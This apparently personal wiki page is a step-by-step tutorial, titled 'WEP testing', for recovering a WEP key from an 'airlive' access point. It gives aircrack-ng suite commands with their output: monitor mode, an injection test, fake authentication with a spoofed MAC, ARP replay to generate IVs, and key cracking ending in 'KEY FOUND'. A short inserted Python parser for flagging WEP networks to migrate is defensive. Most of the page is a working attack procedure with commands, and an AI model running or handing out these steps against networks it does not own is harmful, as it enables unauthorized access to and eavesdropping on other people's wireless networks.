WEP testing

MAC address: e8:de:27:0c:f4:ec

AirLive Wireless AP

Cell 04 - Address: 00:4F:62:17:6B:E3
          Channel:11
          Frequency:2.462 GHz (Channel 11)
          Quality=70/70  Signal level=-15 dBm
          Encryption key:on
          ESSID:"airlive"
          Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 6 Mb/s
                    9 Mb/s; 12 Mb/s; 18 Mb/s
          Bit Rates:24 Mb/s; 36 Mb/s; 48 Mb/s; 54 Mb/s
          Mode:Master
          Extra:tsf=00000000bbb49101
          Extra: Last beacon: 60ms ago
          IE: Unknown: 00076169726C697665
          IE: Unknown: 010882848B960C121824
          IE: Unknown: 03010B
          IE: Unknown: 2A0100
          IE: Unknown: 32043048606C
          IE: Unknown: DD0700E04C01020300

1. Scan the available networks and their details:

iwlist wlan1 scan | less

Note especially its MAC address and channel. To match a frequency to its channel, see: http://www.cisco.com/en/US/docs/wireless/technology/channel/deployment/guide/Channel.html#wp134132 . This will give you the frequency for each channel.
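As an added example (not part of the original page), a small Python parser for iwlist scan output that flags access points still running WEP: a cell that reports Encryption key:on but carries no RSN/WPA information element is WEP-only, which is exactly what the airlive cell above looks like. The sample scan is constructed here from that cell plus two invented cells (one WPA2, one open).

```python
import re

# Constructed sample in iwlist format: the page's "airlive" cell (trimmed)
# plus two invented cells with placeholder MAC addresses.
SAMPLE_SCAN = """\
Cell 04 - Address: 00:4F:62:17:6B:E3
          Channel:11
          Encryption key:on
          ESSID:"airlive"
          IE: Unknown: 00076169726C697665
          IE: Unknown: 03010B
          IE: Unknown: DD0700E04C01020300
Cell 05 - Address: 02:00:00:00:00:01
          Channel:6
          Encryption key:on
          ESSID:"example-wpa2"
          IE: IEEE 802.11i/WPA2 Version 1
              Group Cipher : CCMP
Cell 06 - Address: 02:00:00:00:00:02
          Channel:1
          Encryption key:off
          ESSID:"guest-open"
"""

def parse_cells(scan_text):
    """Split iwlist output into one dict per access point."""
    cells = []
    for block in re.split(r"^\s*Cell \d+ - ", scan_text, flags=re.M)[1:]:
        cell = {"bssid": None, "essid": None, "channel": None,
                "encrypted": False, "rsn_or_wpa": False}
        for line in block.splitlines():
            line = line.strip()
            if line.startswith("Address:"):
                cell["bssid"] = line.split(":", 1)[1].strip()
            elif line.startswith("Channel:"):
                cell["channel"] = int(line.split(":", 1)[1])
            elif line.startswith("ESSID:"):
                cell["essid"] = line.split(":", 1)[1].strip().strip('"')
            elif line.startswith("Encryption key:"):
                cell["encrypted"] = line.endswith("on")
            elif line.startswith("IE:"):
                ie = line[3:].strip().upper()
                # Decoded WPA/WPA2 IE, raw RSN IE (element id 0x30), or raw
                # WPA vendor IE (DD ... 0050F201) all mean "not WEP".
                if ("WPA" in ie or "802.11I" in ie or ie.startswith("UNKNOWN: 30")
                        or (ie.startswith("UNKNOWN: DD") and "0050F201" in ie)):
                    cell["rsn_or_wpa"] = True
        cells.append(cell)
    return cells

def classify(cell):
    """'open', 'wpa' (RSN/WPA present) or 'wep' (encrypted, no RSN/WPA)."""
    if not cell["encrypted"]:
        return "open"
    return "wpa" if cell["rsn_or_wpa"] else "wep"

def wep_networks(scan_text):
    return [c["essid"] for c in parse_cells(scan_text) if classify(c) == "wep"]
```

Feed it the raw text of `iwlist wlan1 scan` to get a list of ESSIDs that should be migrated off WEP.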

2. Shut down the network card from normal operation

airmon-ng stop wlan1

3. Start the interface in monitor mode

airmon-ng start wlan1 11

where 11 is the AP's channel.

wlan1		Atheros 	ath9k - [phy1]
				(monitor mode enabled on mon0)
wlan0		Unknown 	iwlwifi - [phy0]

4. Test, that injection is working

aireplay-ng -9 -a 00:4F:62:17:6B:E3 wlan1
12:11:13  Waiting for beacon frame (BSSID: 00:4F:62:17:6B:E3) on channel 11
12:11:13  Trying broadcast probe requests...
12:11:13  Injection is working!
12:11:15  Found 1 AP

12:11:15  Trying directed probe requests...
12:11:15  00:4F:62:17:6B:E3 - channel: 11 - 'airlive'
12:11:15  Ping (min/avg/max): 1.105ms/6.782ms/17.021ms Power: -25.83
12:11:15  30/30: 100%

5. Start capturing the IVs. Open another console and run

 airodump-ng -c 11 --bssid 00:4F:62:17:6B:E3 -w wifi_iv wlan1

where -c 11 is the AP's channel and -w wifi_iv is the prefix for the files holding the IVs.

6. In the meantime, you need to associate your MAC address with the AP in order to collect IVs. Use either fake authentication (see below) or the MAC address of an already-connected host.

aireplay-ng -1 6000 -o 1 -q 10 -a 00:4F:62:17:6B:E3 -h E8:DE:27:0C:F4:EC wlan1

where -1 is the fake authentication,
6000 means re-association every 6000 seconds,
-o 1 sends only one set of packets at a time; multiple sets can confuse some APs,
-q 10 keeps sending keep-alive packets every 10 s,
-h E8:DE:27:0C:F4:EC is the MAC address of your wlan1 or the MAC of another already-connected host.

7. Open another console and try to listen for ARP requests and re-inject them back to the AP

aireplay-ng -3 -b 00:4F:62:17:6B:E3 -h E8:DE:27:0C:F4:EC wlan1

It will start listening for ARP requests and when it hears one, aireplay-ng will immediately start to inject it. See the Generating ARPs section for tricks on generating ARPs if your screen says “got 0 ARP requests” after waiting a long time.

You can confirm that you are injecting by checking your airodump-ng screen. The data packets should be increasing rapidly.

If you receive a message similar to “Got a deauth/disassoc packet. Is the source mac associated?”, this means you have lost association with the AP. All your injected packets will be ignored. You must return to the fake authentication step (Step 6) and successfully associate with the AP.

8. Run aircrack-ng to obtain the WEP key in a new console

aircrack-ng -b 00:4F:62:17:6B:E3 wifi_iv*.cap

You can also add -n 64 if you know the key is only 64 bits long. This uses the very quick PTW method, which, however, is usable only as long as you are able to collect ARP request/reply packets.

To use the FMS/KoreK method, add the -K switch.

You can run this while generating packets. In a short time, the WEP key will be calculated and presented. For FMS/KoreK, you will need approximately 250,000 IVs for 64-bit and 1,500,000 IVs for 128-bit keys. If you are using the PTW attack, then you will need about 20,000 packets for 64-bit and 40,000 to 85,000 packets for 128-bit keys. These are very approximate figures, and there are many variables affecting how many IVs you actually need to crack the WEP key.

                                 Aircrack-ng 1.1

                 [00:06:18] Tested 4995588 keys (got 328514 IVs)

   KB    depth   byte(vote)
    0    0/  1   AB(  93) 20(  15) 48(  15) 58(  15) AE(  15)
    1    0/  3   CD(  84) 75(  63) 43(  47) 55(  26) 09(  22)
    2    0/  2   EF(  71) 8D(  70) B6(  30) 2F(  15) 37(  15)
    3    0/  1   12( 130) 01(  31) 7C(  30) 26(  29) E7(  28)

                         KEY FOUND! [ AB:CD:EF:12:34 ]
	Decrypted correctly: 100%

Generating ARPs

In order for this tutorial to work, you must receive at least one ARP packet. On your home network, here is an easy way to generate an ARP packet. On a wired or wireless PC, ping a non-existent IP on your home LAN. A wired PC means a PC connected to your LAN via an Ethernet cable. Let's say your home LAN address space is 192.168.1.1 through 192.168.1.254. Pick an IP between 1 and 254 which is not assigned to a network device. For example, if the IP 192.168.1.213 is not being used, then run “ping 192.168.1.213”. This will cause an ARP request to be broadcast via your wireless access point and, in turn, this will kick off the reinjection of packets by aireplay-ng.

unix/wep.txt · Last modified: 2014/12/22 10:47 by bajeluk